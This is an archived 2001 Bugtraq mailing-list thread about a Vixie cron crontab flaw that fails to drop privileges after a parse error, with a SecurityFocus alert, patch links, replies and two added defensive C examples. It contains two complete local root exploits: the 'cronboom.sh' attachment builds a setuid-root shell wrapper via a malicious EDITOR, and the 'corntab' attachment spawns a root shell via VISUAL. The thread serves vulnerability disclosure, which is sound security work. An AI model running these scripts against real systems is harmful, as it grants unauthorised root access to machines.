6468468 2001-05-07 16:08 -0600 /17 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16915>
Subject: Vixie cron vulnerability
------------------------------------------------------------
Greetings Bugtraqers,
Attached is a simple proof of concept for the vixie cron vulnerability
recently published in Debian Security Advisory DSA-054-1. The code was
written during SIA analysis of this vulnerability.
Further information on the vulnerability may be found in the
SecurityFocus SIA commercial alert, also attached to this message.
Cade Cairns
SecurityFocus
http://www.securityfocus.com/
(6468468) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Reflowed)
Attachment (text/plain) in text 6468469
Attachment (text/plain) in text 6468470
Comment in text 6469468 by Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Comment in text 6469755 by Michal Zalewski <lcamtuf@COREDUMP.CX>
6468469 2001-05-07 16:08 -0600 /83 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Attachment filename: "cronboom.sh"
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16916>
Attachment (text/plain) to text 6468468
Subject: Attachment (cronboom.sh) to: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for a separate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# references:
# http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
(6468469) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Reflowed)
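The header comment of the script above names the root cause: a setuid-root program that drops privileges on the first pass through its edit routine but not on the retry path it takes after a parse error. The C program below is an added example, not code from the page or from Vixie cron, showing the pattern such a program should follow: drop supplementary groups, gid and uid irrevocably, verify the drop (including that uid 0 cannot be regained), and do all of that on every pass of the edit/parse/retry loop before the user-chosen editor runs. The `edit_with_retries`, `demo_editor` and `demo_parse` functions and the `struct demo` harness are my own stand-ins for crontab's editor invocation and parser; only the privilege calls are the real system calls.

```c
/*
 * Added example (not from the page or from Vixie cron): the
 * privilege-handling pattern a setuid-root program should follow before
 * handing control to a user-chosen editor, modelled as a small
 * edit/parse/retry loop. The editor and parser are caller-supplied
 * stand-ins; the privilege drop and its verification are real calls.
 */
#define _DEFAULT_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if the process is irrevocably running as uid/gid, else 0. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return 0;
    if (getgid() != gid || getegid() != gid)
        return 0;
    /* A drop that can be undone is no drop: unless the target is root,
     * regaining uid 0 must fail. (For a root target the check is skipped,
     * since setuid(0) is then a no-op.) */
    if (uid != 0 && setuid(0) == 0)
        return 0;
    return 1;
}

/* Permanently drop to uid/gid. Order matters: supplementary groups and
 * gid first, uid last, because after setuid() a former-root process can
 * no longer change its groups. Returns 0 on success, -1 on any failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && uid != 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    return privileges_dropped(uid, gid) ? 0 : -1;
}

/* Caller-supplied stand-ins for "run the editor" and "parse the result". */
typedef void (*editor_fn)(void *ctx);
typedef int (*parse_fn)(void *ctx);   /* 0 = parsed ok, non-zero = error */

/*
 * Edit loop with retry on parse error. The point is that the drop happens
 * on every iteration, before the editor is invoked, and the loop refuses
 * to continue if the drop cannot be verified. Returns 0 when the file
 * parsed, -1 if privileges could not be dropped, -2 when attempts run out.
 */
int edit_with_retries(editor_fn editor, parse_fn parse, int max_attempts,
                      void *ctx)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    for (int attempt = 0; attempt < max_attempts; attempt++) {
        if (drop_privileges(real_uid, real_gid) != 0)
            return -1;
        editor(ctx);
        if (parse(ctx) == 0)
            return 0;
        /* A real crontab asks "retry the edit?" here; the retry path must
         * pass through the same drop as the first attempt did. */
    }
    return -2;
}

/* Demonstration harness (hypothetical): records the euid each editor run
 * observed and makes the first `fail_first_n` parses fail. */
struct demo {
    int runs;
    int fail_first_n;
    uid_t euid_seen[8];
};

void demo_editor(void *p)
{
    struct demo *d = p;
    if (d->runs < 8)
        d->euid_seen[d->runs] = geteuid();
    d->runs++;
}

int demo_parse(void *p)
{
    struct demo *d = p;
    return d->runs <= d->fail_first_n ? 1 : 0;
}

int main(void)
{
    struct demo d = { 0, 2, {0} };
    int rc = edit_with_retries(demo_editor, demo_parse, 5, &d);
    printf("result %d after %d editor runs; euid in last run %ld (real uid %ld)\n",
           rc, d.runs, (long)d.euid_seen[d.runs - 1], (long)getuid());
    return rc == 0 ? 0 : 1;
}
```

Run unprivileged, the drop is to the caller's own uid and gid and the regain check confirms that setuid(0) fails; run as root it is a no-op. That is why a reviewer of a setuid program should look for the verification step on every code path, not merely for the presence of a setuid() call somewhere before the first editor invocation.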
6468470 2001-05-07 16:08 -0600 /250 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Attachment filename: "SIA-2687.txt"
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16917>
Attachment (text/plain) to text 6468468
Subject: Attachment (SIA-2687.txt) to: Vixie cron vulnerability
------------------------------------------------------------
Thank you for using SecurityFocus.com's Security Intelligence Alert
(SIA) Service. To manage your account please visit
https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
---------------------------------------------------------------------------
Security Alert
Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability
BUGTRAQ ID: 2687
CVE ID: CVE-MAP-NOMATCH
Published: May 07, 2001
Updated: May 07, 2001
Remote: No
Local: Yes
Availability: User Initiated
Authentication: Not Required
Credibility: Vendor Confirmed
Ease: Exploit Available
Class: Serialization Error
Impact: 10.00
Severity: 6.90
Urgency: 7.59
Last Change: Initial analysis.
---------------------------------------------------------------------------
Vulnerable Systems:
Paul Vixie Vixie Cron 3.0pl1
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
Non-Vulnerable Systems:
Summary:
Local users can cause Vixie crontab to fail to drop privileges
when editing files. Can lead to full system compromise.
Impact:
Local users can manipulate crontab's lowering of privileges,
leading to full system compromise.
Technical Description:
Vixie cron is an implementation of the popular UNIX program that
runs user-specified programs at periodic scheduled times.
A serialization error exists in some versions of the crontab
file maintenance program. The vulnerability was introduced in
versions which were patched for a separate vulnerability in fall
of 2000 (see Bugtraq ID #1960).
When a parsing error occurs after a modification operation,
crontab will fail to drop privileges correctly for subsequent
modification operations. Because the program is installed setuid
root, it may be possible for a local user to gain root
privileges.
Attack Scenarios:
An attacker with local access must edit their crontab file and
enter a line that causes the parser to fail.
The attacker must then enter 'yes' when prompted as to whether he or
she wishes to attempt to fix the error in the file. This will cause
the editor to be invoked again, but with full privileges.
The attacker could then execute arbitrary commands from the editor,
or overwrite otherwise protected system files.
Exploits:
During SIA analysis of this vulnerability, Cade Cairns
<cairnsc@securityfocus.com> wrote proof-of-concept exploit code.
http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh
Mitigating Strategies:
Restricting local access to the host may prevent unauthorized
users from exploiting this vulnerability. Restrict access to the
cron facility to trusted users via the /etc/cron.allow and
/etc/cron.deny files (man crontab).
Solutions:
For Paul Vixie Vixie Cron 3.0pl1:
Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb
Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb
Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb
Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb
Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb
Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb
Credit:
Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May
7, 2001.
References:
advisory:
Debian DSA-054-1: cron
http://www.securityfocus.com/advisories/3282
ChangeLog:
May 07, 2001: Initial analysis.
---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT
BUGTRAQ ID: This is a unique identifier assigned to the
vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the
vulnerability by the CVE.
Published: The date the vulnerability was first made
public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable
vulnerability.
Local: Whether this is a locally exploitable
vulnerability.
Credibility: Describes how credible the information about the
vulnerability is. Possible values are:
Conflicting Reports: There are multiple
conflicting reports about the existence of the
vulnerability.
Single Source: There is a single non-reliable
source reporting the existence of the
vulnerability.
Reliable Source: There is a single reliable
source reporting the existence of the
vulnerability.
Conflicting Details: There is consensus on the
existence of the vulnerability but not its
details.
Multiple Sources: There is consensus on the
existence and details of the vulnerability.
Vendor Confirmed: The vendor has
confirmed the vulnerability.
Class: The class of vulnerability. Possible values are:
Boundary Condition Error, Access Validation Error,
Origin Validation Error, Input Validation Error,
Failure to Handle Exceptional Conditions, Race
Condition Error, Serialization Error, Atomicity
Error, Environment Error, and Configuration Error.
Ease: Rates how easily the vulnerability can be
exploited. Possible values are: No Exploit
Available, Exploit Available, and No Exploit
Required.
Impact: Rates the impact of the vulnerability. Its range
is 1 through 10.
Severity: Rates the severity of the vulnerability. Its range
is 1 through 10. It is computed from the impact
rating and remote flag. Remote vulnerabilities with
a high impact rating receive a high severity
rating. Local vulnerabilities with a low impact
rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or
mitigate the vulnerability. Its range is 1 through
10. It is computed from the severity rating, the
ease rating, and the credibility rating. High
severity vulnerabilities with a high ease rating,
and a high confidence rating have a higher urgency
rating. Low severity vulnerabilities with a low
ease rating, and a low confidence rating have a
lower urgency rating.
Last Change: The last change made to the vulnerability
information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system
components is vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a
vulnerability is found in IE you may see something
like:
Microsoft Internet Explorer
+ Microsoft Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the
vulnerability.
Exploits: Exploit instructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the
vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability
record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com
Thank you for using SecurityFocus.com's Security Intelligence Alert
(SIA) Service. To manage your account please visit
https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
(6468470) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Reflowed)
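The alert's mitigation section points to /etc/cron.allow and /etc/cron.deny. The C program below is an added example, not from the page or from Vixie cron, that implements the access decision crontab(1) documents for those two files (allow file present: only listed users; otherwise deny file present: everyone not listed; neither present: a site-dependent default), so an administrator can check what a given configuration actually grants before relying on it. The file paths and the unconfigured default are parameters; the allow/deny files the program writes under /tmp are constructed for the demonstration, and `write_text_file` is a helper of mine, not part of cron.

```c
/*
 * Added example (not from the page or from Vixie cron): the cron.allow /
 * cron.deny access decision as documented in crontab(1), written as a
 * stand-alone function so a configuration can be checked against copies
 * or test files instead of the live /etc files.
 */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

enum cron_access { CRON_DENIED = 0, CRON_ALLOWED = 1 };

static int file_exists(const char *path)
{
    struct stat st;
    return path != NULL && stat(path, &st) == 0;
}

/* Returns 1 if `user` appears as a whole line in `path` (blank lines and
 * trailing whitespace ignored), 0 otherwise or if the file is unreadable.
 * Whole-line comparison matters: "back" must not match "backup". */
int user_listed_in(const char *path, const char *user)
{
    FILE *f = fopen(path, "r");
    char line[256];
    int found = 0;
    if (f == NULL)
        return 0;
    while (!found && fgets(line, sizeof line, f) != NULL) {
        line[strcspn(line, "\r\n")] = '\0';
        size_t n = strlen(line);
        while (n > 0 && (line[n - 1] == ' ' || line[n - 1] == '\t'))
            line[--n] = '\0';
        if (n > 0 && strcmp(line, user) == 0)
            found = 1;
    }
    fclose(f);
    return found;
}

/*
 * crontab(1) rules: if the allow file exists, only users listed in it may
 * use crontab; otherwise, if the deny file exists, every user not listed
 * in it may; if neither exists, crontab(1) says the result depends on
 * site configuration, so that outcome is passed in by the caller.
 */
enum cron_access cron_access_for(const char *user, const char *allow_path,
                                 const char *deny_path,
                                 enum cron_access default_when_unconfigured)
{
    if (file_exists(allow_path))
        return user_listed_in(allow_path, user) ? CRON_ALLOWED : CRON_DENIED;
    if (file_exists(deny_path))
        return user_listed_in(deny_path, user) ? CRON_DENIED : CRON_ALLOWED;
    return default_when_unconfigured;
}

/* Helper (hypothetical, for the demonstration): write `text` to `path`. */
int write_text_file(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(text, f);
    return fclose(f) == 0 ? 0 : -1;
}

int main(void)
{
    /* Constructed sample files; not the real /etc/cron.allow and cron.deny. */
    const char *allow = "/tmp/example.cron.allow";
    const char *deny = "/tmp/example.cron.deny";
    const char *missing = "/tmp/example.cron.missing";
    write_text_file(allow, "root\nbackup\n");
    write_text_file(deny, "guest\n");
    printf("backup, allow file present : %d\n",
           cron_access_for("backup", allow, deny, CRON_ALLOWED));
    printf("alice,  allow file present : %d\n",
           cron_access_for("alice", allow, deny, CRON_ALLOWED));
    printf("alice,  deny file only     : %d\n",
           cron_access_for("alice", missing, deny, CRON_ALLOWED));
    printf("guest,  deny file only     : %d\n",
           cron_access_for("guest", missing, deny, CRON_ALLOWED));
    remove(allow);
    remove(deny);
    return 0;
}
```

The practical consequence for the mitigation the alert recommends: an empty or root-only cron.allow is the restrictive configuration, while a cron.deny alone only excludes the names in it and leaves every other local account able to invoke the setuid crontab binary.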
6469468 2001-05-08 13:44 -0400 /34 lines/ Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-05-08 22:45 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: Edwin.Chiu@E-WARES.COM
Recipient: Bugtraq (import) <16922>
Comment on text 6468468 by Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
From: Edwin Chiu <Edwin.Chiu@E-WARES.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AF83087.B0D2765@e-wares.com>
FYI
The exploit failed for:
Redhat 6.1
vixie-cron-3.0.1-39
Redhat 6.2
vixie-cron-3.0.1-40
Regards,
Edwin
Cade Cairns wrote:
> Greetings Bugtraqers,
>
> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
>
> Further information on the vulnerability may be found in the SecurityFocus
> SIA commercial alert, also attached to this message.
>
> Cade Cairns
> SecurityFocus
> http://www.securityfocus.com/
(6469468) /Edwin Chiu <Edwin.Chiu@E-WARES.COM>/-----
Comment in text 6469713 by Jay D. Dyson <jdyson@TREACHERY.NET>
6469713 2001-05-08 14:01 -0700 /39 lines/ Jay D. Dyson <jdyson@TREACHERY.NET>
Sent by: joel@lysator.liu.se
Imported: 2001-05-09 00:05 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jdyson@treachery.net
Recipient: Bugtraq (import) <16923>
Comment on text 6469468 by Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
From: "Jay D. Dyson" <jdyson@TREACHERY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.GSO.3.96.1010508135756.3740B-100000@crypto>
-----BEGIN PGP SIGNED MESSAGE-----
On Tue, 8 May 2001, Edwin Chiu wrote:
> The exploit failed for:
> Redhat 6.1
> vixie-cron-3.0.1-39
> Redhat 6.2
> vixie-cron-3.0.1-40
*nod* I wrote to Cade directly regarding the advisory as it
seems to me that the issue is more a matter of Debian's
implementation of Vixie cron than an issue with Vixie cron itself.
I'm still futzing with it to see if any other implementations will
squeal. Fun and interesting results will be posted when found. ;)
- -Jay
( ( _______
)) )) .- "There's always time for a good cup of coffee" -. >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson@treachery.net ------<) | = |-'
`--' `--' `---------- "Si vis pacem, para bellum." ----------' `------'
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
iQCVAwUBOvhQldCClfiU/BIVAQECcgP/fnDkOGxVAm6S+UKnCS5Kmdjnl67nVYGf
IFaWyv9JKF82A7E7L0PBI9hTe27YvyhamFDBVIDAu79n1AszxXUt7g+F0WEuHtpy
gBegB1+KnJCq8vzzdB9kBmCAe+XeILaG49BvACOcvww2AJN0YZhHu3ZA5COtWwhF
QxBGcf+6MFw=
=pGCW
-----END PGP SIGNATURE-----
(6469713) /Jay D. Dyson <jdyson@TREACHERY.NET>/(Reflowed)
6469755 2001-05-08 11:30 -0400 /18 lines/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Sent by: joel@lysator.liu.se
Imported: 2001-05-09 00:24 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lcamtuf@COREDUMP.CX
Recipient: Bugtraq (import) <16924>
Comment on text 6468468 by Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
On Mon, 7 May 2001, Cade Cairns wrote:
> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
Hm, there is my original proof-of-concept I coded for Sebastian
Krahmer (who discovered this vulnerability), while working on
it. This vulnerability affects Debian, SuSE, and probably a few other
Linuxes as well. It is a perfect example of bad coding, and how
improper fixing of bugs might lead to even more dangerous
conditions. It is fully automated, and I believe it gives absolutely
nothing to the attacker, as this vulnerability can be exploited by
hand in approximately 5 seconds ;)
Michal Zalewski
http://lcamtuf.coredump.cx
(6469755) /Michal Zalewski <lcamtuf@COREDUMP.CX>/(Reflowed)
Attachment (text/plain) in text 6469756
6469756 2001-05-08 11:30 -0400 /88 lines/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Attachment filename: "corntab"
Imported: 2001-05-09 00:24 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lcamtuf@COREDUMP.CX
Recipient: Bugtraq (import) <16925>
Attachment (text/plain) to text 6469755
Subject: Attachment (corntab) to: Re: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
(6469756) /Michal Zalewski <lcamtuf@COREDUMP.CX>/---